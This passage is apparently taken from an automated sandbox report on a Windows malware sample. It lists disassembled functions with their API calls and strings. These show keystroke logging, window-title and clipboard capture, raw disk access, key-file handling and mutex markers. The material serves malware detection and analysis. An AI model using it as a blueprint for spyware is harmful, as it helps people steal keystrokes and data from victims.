                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B47
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: HeapValidate.KERNEL32(00000000), ref: 02C81B4A
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B57
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: HeapFree.KERNEL32(00000000), ref: 02C81B5A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,00000000), ref: 02C81C15
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C81C1C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81C2F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 02C81C3F
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02C81C46
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,02C83142,?,?,?,00000000), ref: 02C81C66
                                                                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C81C6D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$AllocValidatememset$AncestorFreeTextWindow
                                                                                                                                                                                                                    • String ID: [bks]$[del]$[ins]$[ret]$[tab]
                                                                                                                                                                                                                    • API String ID: 4095246728-233650549
                                                                                                                                                                                                                    • Opcode ID: 1fe5b6ceba38fa2ef0e36c1ed7f9f926612c882d500b9cf1e6cc991abbf892d1
                                                                                                                                                                                                                    • Instruction ID: 7c5269ea7c08bc0399d571e4fe4db444f479d83ea25b64e7ed57dd8896304e30
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fe5b6ceba38fa2ef0e36c1ed7f9f926612c882d500b9cf1e6cc991abbf892d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6751B171D40259EBCB06DF68D844BEABBF4EF85704F08C69AE9599B340E7709605CFA0
                                                                                                                                                                                                                    Function 02C71670 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,7622F550,7622DF10,7693BD50), ref: 02C7168A
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C7169B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 02C716AF
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C716D1
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 02C716E1
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 02C716FC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTextA), ref: 02C71708
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressModuleProcVirtual$HandleProtect$AllocFileNamememcpy
                                                                                                                                                                                                                    • String ID: CreateFileW$GetFileAttributesW$GetWindowTextA$\explorer.exe$kernel32.dll$user32.dll
                                                                                                                                                                                                                    • API String ID: 1733008709-77332811
                                                                                                                                                                                                                    • Opcode ID: 57dff1963361da8fcf9c11d16e13aa53cd21a35e299a54161ab77388b63f76bb
                                                                                                                                                                                                                    • Instruction ID: 5f46313f880d90b31587728bf913cb7d4136ef782d41e1b131f9a8acf3e83ebe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57dff1963361da8fcf9c11d16e13aa53cd21a35e299a54161ab77388b63f76bb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD01B5B2B8035936FA1176755C46FAB635DDF80A98F0902B0BA0AF3140DFE5E5018978
                                                                                                                                                                                                                    Function 02C92320 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C92337
                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI(?), ref: 02C92344
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02C92394
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 02C923AC
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 02C923B5
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,?), ref: 02C923C5
                                                                                                                                                                                                                      • Part of subcall function 02C92180: PathAddBackslashA.SHLWAPI(7F1BF93B), ref: 02C921B0
                                                                                                                                                                                                                      • Part of subcall function 02C92180: CreateDirectoryA.KERNEL32(?,00000000), ref: 02C921F1
                                                                                                                                                                                                                      • Part of subcall function 02C92180: GetLastError.KERNEL32 ref: 02C921FB
                                                                                                                                                                                                                      • Part of subcall function 02C92180: IsUserAnAdmin.SHELL32 ref: 02C92203
                                                                                                                                                                                                                      • Part of subcall function 02C92180: PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92214
                                                                                                                                                                                                                      • Part of subcall function 02C92180: SetLastError.KERNEL32(00000000), ref: 02C9221B
                                                                                                                                                                                                                      • Part of subcall function 02C92180: SetCurrentDirectoryA.KERNEL32(?), ref: 02C92228
                                                                                                                                                                                                                      • Part of subcall function 02C92180: PathAddBackslashA.SHLWAPI(7F1BF93B,?,02C923DC), ref: 02C92297
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF93B), ref: 02C923E6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$Backslash$CharDirectoryErrorFileLastNameUpper$AdminCreateCurrentFindFolderMakeModulePrivateProfileStringSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BF93B$DefaultPrivateDir$General$STF$interpro.ini
                                                                                                                                                                                                                    • API String ID: 2256374885-467714554
                                                                                                                                                                                                                    • Opcode ID: 864d110604232c3970b2dbd9d73b3e1dd009542271c608b37789ece5d2bbf5bd
                                                                                                                                                                                                                    • Instruction ID: bd3d41e6ccc1ab58686192a431e20eef7b7d56b6ab04b4250f60db2969be4403
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 864d110604232c3970b2dbd9d73b3e1dd009542271c608b37789ece5d2bbf5bd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B111B7B5980258AFEB11DB64DC88FD7777DEF94700F0087D5E94997140DAB09694CF50
                                                                                                                                                                                                                    Function 02C9BE40 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 208fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C9BE6A
                                                                                                                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,Desk,?,00000000), ref: 02C9BF52
                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(Desk,00000000), ref: 02C9BFC9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFindFirstFolderPathSpecialmemset
                                                                                                                                                                                                                    • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                                    • API String ID: 1415333704-2295261572
                                                                                                                                                                                                                    • Opcode ID: b863af03ad562f690d3ed4544fdd299490f7b2803116509b57fe53c6cb82ff01
                                                                                                                                                                                                                    • Instruction ID: f905a9860a681978eddc4a4b347b3f55719ae1248870c2110f2da26bf711aa9a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b863af03ad562f690d3ed4544fdd299490f7b2803116509b57fe53c6cb82ff01
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03615B32504148ABDF21CB28AC8CBEAB76ADB85318F1487D5D5899B181E732DF498FC0
                                                                                                                                                                                                                    Function 02C82030 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C82051
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(02CCBADC,?,?,?), ref: 02C82068
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(02CCBADC,?,?,?), ref: 02C82078
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C820A5
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02C820C7
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000104,02C82265,00000000,00000000,76229300), ref: 02C820FB
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,02C82265), ref: 02C82112
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C82123
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHandle$CloseCreateCurrentDirectoryDriveInformationTypeWrite_snprintfmemset
                                                                                                                                                                                                                    • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                                    • API String ID: 1874144376-3292898883
                                                                                                                                                                                                                    • Opcode ID: 2b5d1b2012bd9ae7f3124b070fba5dae7f4bd62ce57e6959b311a3f7f952f045
                                                                                                                                                                                                                    • Instruction ID: 18f3149309e499d998e30ee7a0284b8f21fa454f41ee8954f8bd106cee32a35a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b5d1b2012bd9ae7f3124b070fba5dae7f4bd62ce57e6959b311a3f7f952f045
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9321D671D81254A7E722E654DC4DBE9B3ACDF44719F208689FE44A60C0D7B45F848AA2
                                                                                                                                                                                                                    Function 02C7C9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                                    • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                                    • API String ID: 776485234-1938657081
                                                                                                                                                                                                                    • Opcode ID: 34c49a98c2f3da91a95aee6fd643c74d9e5d278e1fff4f1a5c1e83be57eb9a20
                                                                                                                                                                                                                    • Instruction ID: 4f281b4965ab4645f2a855e6039ddb837b837f02e4bdfe07565213358f8d337e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34c49a98c2f3da91a95aee6fd643c74d9e5d278e1fff4f1a5c1e83be57eb9a20
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A012D72ED02587DF22666E5AC47DF77B5CDF81A52F410776F84752040D9A05E00CAB2
                                                                                                                                                                                                                    Function 02C78630 Relevance: 13.5, APIs: 9, Instructions: 43clipboardmemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,?), ref: 02C7863B
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 02C7864A
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 02C78661
                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 02C78669
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 02C78676
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C78681
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 02C78687
                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 02C78690
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 02C78696
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyErrorFreeLastLockOpenUnlock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4128149074-0
                                                                                                                                                                                                                    • Opcode ID: f5055803d4cc30bc26f8218214dcff48e7a1b6b9fd65af536ea44528800121ef
                                                                                                                                                                                                                    • Instruction ID: bcc6ebb28586aa2af1744841ab3729a61f90c1b9fdc9e02adbdc07cdfc94f63e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5055803d4cc30bc26f8218214dcff48e7a1b6b9fd65af536ea44528800121ef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FF04472A84284AFD7015BA5BC8CF5B7BACEF88326F044655FA0DC3141DB7098218660
                                                                                                                                                                                                                    Function 02C9E6D0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • setsockopt.WS2_32(?,00000006,00000001,02C98817,00000004), ref: 02C9E737
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: setsockopt
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3981526788-0
                                                                                                                                                                                                                    • Opcode ID: c90b312789074b0205176c452a4f2296d311b816923bfb5513e3d95fbb56f09d
                                                                                                                                                                                                                    • Instruction ID: 8809aeba94acb1b4cd9fd2406f2df005efe3646a09cd2de55401464d0af224d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c90b312789074b0205176c452a4f2296d311b816923bfb5513e3d95fbb56f09d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4519F70A00B01ABEB20CF79C888BD7B7F5EF85714F60895ED56E87280DB31A6019B50
                                                                                                                                                                                                                    Function 02C91150 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C9116E
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C91193
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02C911A5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleNamememset
                                                                                                                                                                                                                    • String ID: \clmain.exe
                                                                                                                                                                                                                    • API String ID: 350293641-582869414
                                                                                                                                                                                                                    • Opcode ID: 07b77963ca84e51e3e4e4426c7f825cba2275471efa8de69b28ec33cb12ce073
                                                                                                                                                                                                                    • Instruction ID: 8612c5f56324f6a3a35b79f9aaee419075629bab937a1ab13b56e47f2d9977c4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07b77963ca84e51e3e4e4426c7f825cba2275471efa8de69b28ec33cb12ce073
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F0AE719942086BEB54D6749C46BE573ACDB54705F0006D5EA4DC60C0E7F155D88A91
                                                                                                                                                                                                                    Function 02C9C3DB Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C9C3F9
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 02C9C43E
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 02C9C4B2
                                                                                                                                                                                                                    • free.MSVCRT ref: 02C9C4DF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2496910992-0
                                                                                                                                                                                                                    • Opcode ID: 8c72acc23544a2b183772906408102910aa18aa9b5e8c7a720d7394e280cae27
                                                                                                                                                                                                                    • Instruction ID: ddda68bf6b47aa3effb100a9642183e40d22baf30358de738433dca4d76275b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c72acc23544a2b183772906408102910aa18aa9b5e8c7a720d7394e280cae27
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC313A7270429E8FCF10CE98E8886FE7758EF5A354F1006A3E94587241D7318766CBA2
                                                                                                                                                                                                                    Function 02C8F1B0 Relevance: 86.1, APIs: 42, Strings: 7, Instructions: 347memorysleepstringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8F1D0
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfddb), ref: 02C8F1F7
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F235
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8F23F
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8F247
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F259
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8F260
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8F29C
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8F2AA
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfddb,?,?), ref: 02C8F2E5
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F31F
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8F329
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8F331
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F340
                                                                                                                                                                                                                      • Part of subcall function 02C96FF0: UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000,?), ref: 02C97017
                                                                                                                                                                                                                      • Part of subcall function 02C96FF0: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97037
                                                                                                                                                                                                                      • Part of subcall function 02C96FF0: CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97048
                                                                                                                                                                                                                      • Part of subcall function 02C96FF0: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97061
                                                                                                                                                                                                                      • Part of subcall function 02C96FF0: CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97072
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8F347
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8F375
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8F3A0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8F3EB
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,secret.key,00000104), ref: 02C8F405
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8F448
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002), ref: 02C8F462
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,02CB854C,00000002), ref: 02C8F487
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8F4CA
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,pubkeys.key,00000104), ref: 02C8F4E4
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002), ref: 02C8F509
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02C8F540
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8F543
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8F550
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8F553
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?), ref: 02C8F562
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8F573
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8F57A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32 ref: 02C8F58E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8F5A0
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002), ref: 02C8F5CD
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8F5D0
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8F5DD
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8F5E0
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002), ref: 02C8F5E9
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8F5EC
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F5FD
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8F600
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
